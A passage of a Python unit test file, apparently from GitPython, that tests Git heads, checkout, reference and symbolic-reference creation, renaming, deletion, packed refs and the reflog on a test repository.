    assert head.commit == old_commit  # and the ref did not change
    # we allow heads to point to any object
    head.object = head_tree
    assert head.object == head_tree
    # cannot query tree as commit
    self.assertRaises(TypeError, getattr, head, 'commit')

    # set the commit directly using the head. This would never detach the head
    assert not cur_head.is_detached
    head.object = old_commit
    cur_head.reference = head.commit
    assert cur_head.is_detached
    parent_commit = head.commit.parents[0]
    assert cur_head.is_detached
    cur_head.commit = parent_commit
    assert cur_head.is_detached and cur_head.commit == parent_commit

    cur_head.reference = head
    assert not cur_head.is_detached
    cur_head.commit = parent_commit
    assert not cur_head.is_detached
    assert head.commit == parent_commit

    # test checkout
    active_branch = rw_repo.active_branch
    for head in rw_repo.heads:
        checked_out_head = head.checkout()
        assert checked_out_head == head
    # END for each head to checkout

    # checkout with branch creation
    new_head = active_branch.checkout(b="new_head")
    assert active_branch != rw_repo.active_branch
    assert new_head == rw_repo.active_branch

    # checkout with force as we have changed a file
    # clear file
    open(new_head.commit.tree.blobs[-1].abspath, 'w').close()
    assert len(new_head.commit.diff(None))

    # create a new branch that is likely to touch the file we changed
    far_away_head = rw_repo.create_head("far_head", 'HEAD~100')
    self.assertRaises(GitCommandError, far_away_head.checkout)
    assert active_branch == active_branch.checkout(force=True)
    assert rw_repo.head.reference != far_away_head

    # test reference creation
    partial_ref = 'sub/ref'
    full_ref = 'refs/%s' % partial_ref
    ref = Reference.create(rw_repo, partial_ref)
    assert ref.path == full_ref
    assert ref.object == rw_repo.head.commit

    self.assertRaises(OSError, Reference.create, rw_repo, full_ref, 'HEAD~20')
    # it works if it is at the same spot though and points to the same reference
    assert Reference.create(rw_repo, full_ref, 'HEAD').path == full_ref
    Reference.delete(rw_repo, full_ref)

    # recreate the reference using a full_ref
    ref = Reference.create(rw_repo, full_ref)
    assert ref.path == full_ref
    assert ref.object == rw_repo.head.commit

    # recreate using force
    ref = Reference.create(rw_repo, partial_ref, 'HEAD~1', force=True)
    assert ref.path == full_ref
    assert ref.object == rw_repo.head.commit.parents[0]

    # rename it
    orig_obj = ref.object
    for name in ('refs/absname', 'rela_name', 'feature/rela_name'):
        ref_new_name = ref.rename(name)
        assert isinstance(ref_new_name, Reference)
        assert name in ref_new_name.path
        assert ref_new_name.object == orig_obj
        assert ref_new_name == ref
    # END for each name type

    # References that don't exist trigger an error if we want to access them
    self.assertRaises(ValueError, getattr, Reference(rw_repo, "refs/doesntexist"), 'commit')

    # exists, fail unless we force
    ex_ref_path = far_away_head.path
    self.assertRaises(OSError, ref.rename, ex_ref_path)
    # if it points to the same commit it works
    far_away_head.commit = ref.commit
    ref.rename(ex_ref_path)
    assert ref.path == ex_ref_path and ref.object == orig_obj
    assert ref.rename(ref.path).path == ex_ref_path  # rename to same name

    # create symbolic refs
    symref_path = "symrefs/sym"
    symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)
    assert symref.path == symref_path
    assert symref.reference == cur_head.reference

    self.assertRaises(OSError, SymbolicReference.create, rw_repo, symref_path, cur_head.reference.commit)
    # it works if the new ref points to the same reference
    SymbolicReference.create(rw_repo, symref.path, symref.reference).path == symref.path  # @NoEffect
    SymbolicReference.delete(rw_repo, symref)
    # would raise if the symref wouldn't have been deleted
    symref = SymbolicReference.create(rw_repo, symref_path, cur_head.reference)

    # test symbolic references which are not at default locations like HEAD
    # or FETCH_HEAD - they may also be at spots in refs of course
    symbol_ref_path = "refs/symbol_ref"
    symref = SymbolicReference(rw_repo, symbol_ref_path)
    assert symref.path == symbol_ref_path
    symbol_ref_abspath = osp.join(rw_repo.git_dir, symref.path)

    # set it
    symref.reference = new_head
    assert symref.reference == new_head
    assert osp.isfile(symbol_ref_abspath)
    assert symref.commit == new_head.commit

    for name in ('absname', 'folder/rela_name'):
        symref_new_name = symref.rename(name)
        assert isinstance(symref_new_name, SymbolicReference)
        assert name in symref_new_name.path
        assert symref_new_name.reference == new_head
        assert symref_new_name == symref
        assert not symref.is_detached
    # END for each ref

    # create a new non-head ref just to be sure we handle it even if packed
    Reference.create(rw_repo, full_ref)

    # test ref listing - assure we have packed refs
    rw_repo.git.pack_refs(all=True, prune=True)
    heads = rw_repo.heads
    assert heads
    assert new_head in heads
    assert active_branch in heads
    assert rw_repo.tags

    # we should be able to iterate all symbolic refs as well - in that case
    # we should expect only symbolic references to be returned
    for symref in SymbolicReference.iter_items(rw_repo):
        assert not symref.is_detached

    # when iterating references, we can get references and symrefs
    # when deleting all refs, I'd expect them to be gone ! Even from
    # the packed ones
    # For this to work, we must not be on any branch
    rw_repo.head.reference = rw_repo.head.commit
    deleted_refs = set()
    for ref in Reference.iter_items(rw_repo):
        if ref.is_detached:
            ref.delete(rw_repo, ref)
            deleted_refs.add(ref)
        # END delete ref
    # END for each ref to iterate and to delete
    assert deleted_refs

    for ref in Reference.iter_items(rw_repo):
        if ref.is_detached:
            assert ref not in deleted_refs
    # END for each ref

    # reattach head - head will not be returned if it is not a symbolic
    # ref
    rw_repo.head.reference = Head.create(rw_repo, "master")

    # At least the head should still exist
    assert osp.isfile(osp.join(rw_repo.git_dir, 'HEAD'))
    refs = list(SymbolicReference.iter_items(rw_repo))
    assert len(refs) == 1

    # test creation of new refs from scratch
    for path in ("basename", "dir/somename", "dir2/subdir/basename"):
        # REFERENCES
        ############
        fpath = Reference.to_full_path(path)
        ref_fp = Reference.from_path(rw_repo, fpath)
        assert not ref_fp.is_valid()
        ref = Reference(rw_repo, fpath)
        assert ref == ref_fp

        # can be created by assigning a commit
        ref.commit = rw_repo.head.commit
        assert ref.is_valid()

        # if the assignment raises, the ref doesn't exist
        Reference.delete(ref.repo, ref.path)
        assert not ref.is_valid()
        self.assertRaises(ValueError, setattr, ref, 'commit', "nonsense")
        assert not ref.is_valid()

        # I am sure I had my reason to make it a class method at first, but
        # now it doesn't make so much sense anymore, want an instance method as well
        # See http://byronimo.lighthouseapp.com/projects/51787-gitpython/tickets/27
        Reference.delete(ref.repo, ref.path)
        assert not ref.is_valid()

        ref.object = rw_repo.head.commit
        assert ref.is_valid()

        Reference.delete(ref.repo, ref.path)
        assert not ref.is_valid()
        self.assertRaises(ValueError, setattr, ref, 'object', "nonsense")
        assert not ref.is_valid()
    # END for each path
def test_dereference_recursive(self):
    """Recursively dereferencing HEAD must yield a truthy target object."""
    # for now, just test the HEAD
    resolved = SymbolicReference.dereference_recursive(self.rorepo, 'HEAD')
    assert resolved
def test_reflog(self):
    """The log of the master head is exposed as a RefLog instance."""
    master_log = self.rorepo.heads.master.log()
    assert isinstance(master_log, RefLog)
| 40.908612
| 111
| 0.63479
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.